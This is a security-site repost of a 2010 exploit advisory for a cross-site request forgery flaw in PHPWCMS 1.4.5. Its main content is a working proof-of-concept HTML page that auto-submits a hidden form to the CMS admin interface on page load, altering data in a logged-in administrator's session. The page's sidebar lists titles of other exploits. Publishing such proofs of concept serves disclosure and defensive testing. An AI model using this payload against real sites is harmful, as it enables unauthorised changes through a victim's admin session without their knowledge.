首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PHPWCMS 1.4.5 r389 Cross Site Request Forgery Vulnerability
来源:http://www.redteamsecure.com/labs 作者:Talamantes 发布时间:2010-06-22  
<?php
 /*
  Exploit Title: PHPWCMS Cross-Site Request Forgery Vulnerability
  Date: 06/16/2010
  Author: Jeremiah Talamantes
  Software Link: http://phpwcms.googlecode.com/files/phpwcms_r398.zip
  Version: 1.4.5 r398
  Tested on: WinXP SP2 (EN) on WAMP 2.0
  CVE: N/A
  
  Jeremiah Talamantes
  RedTeam Security (RedTeam Labs)
  http://www.redteamsecure.com/labs
  
  Description:
  A vulnerability has been identified in PHPWCMS, which could be exploited to conduct cross-site request forgery attacks.
  This issue is caused due to input validation errors in the administrative interface when processing HTTP requests,
  which could be exploited by attackers to manipulate certain data by tricking an administrator into visiting a malicious web page.
 */
?>
<html>
<head>
 <title>PHPWCMS 1.4.5 r389 Cross Site Request Forgery</title>
 <script type="text/javascript">
  function myfunc () {
   var frm = document.getElementById("csrf");
   frm.submit();
  }
  window.onload = myfunc;
 </script>
</head>
<body>
 <!-- Modify the form action parameter to suit your installation -->
 <form id="csrf" name="csrf" method="POST" action="http://localhost/phpwcms/phpwcms.php?do=files&f=0">
  <input type="hidden" name="dir_newname" value="Game Over!" />
  <input type="hidden" name="dir_gallery" value="0" />
  <input type="hidden" name="dir_sort" value="0" />
  <input type="hidden" name="dir_aktiv" value="1" />
  <input type="hidden" name="dir_public" value="1" />
  <input type="hidden" name="dir_pid" value="0" />
  <input type="hidden" name="dir_aktion" value="1" />
 </form>
</body>
</html>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Teamspeak <= 3.0.0-beta25 Mult
·Subtitle Translation Wizard v3
·Sysax Multi Server (SFTP modul
·linux/x86-64 - DNS spoofing C
·cPanel Username look Remote Ex
·Norex v1.3.2.0 Argument Heap-O
·MoreAmp (.maf) local Stack Buf
·phpFK <= v7.0.5 Remote Code Ex
·Safari 5.0 Denial of Service E
·PHP-Nuke <= 8.0 (News) Remote
·Linux/x86-64 - Add root user w
·Subtitle Translation Wizard v3
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved